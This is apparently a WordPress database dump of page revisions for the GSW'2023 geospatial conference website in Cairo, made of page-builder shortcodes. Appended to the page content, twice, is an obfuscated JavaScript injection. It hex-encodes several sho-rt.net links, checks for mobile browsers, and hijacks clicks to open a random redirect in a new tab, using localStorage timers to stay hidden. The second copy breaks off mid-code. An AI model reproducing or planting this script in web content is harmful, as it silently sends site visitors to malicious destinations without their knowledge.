overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 15:02:53','2022-11-09 15:02:53','',3066,'https://gsw2023.com/?p=3123',0,'revision','',0),
(3124,1,'2022-11-09 15:04:00','2022-11-09 15:04:00','[vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h3></h3>\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column_inner][vc_column_inner width=\"3/4\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row][vc_column awb_type=\"image\" awb_stretch=\"1\" awb_image_background_size=\"contain\" awb_image_background_position=\"-100% 100%\" awb_parallax=\"scroll\" awb_parallax_speed=\"0.5\" awb_image=\"3068\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 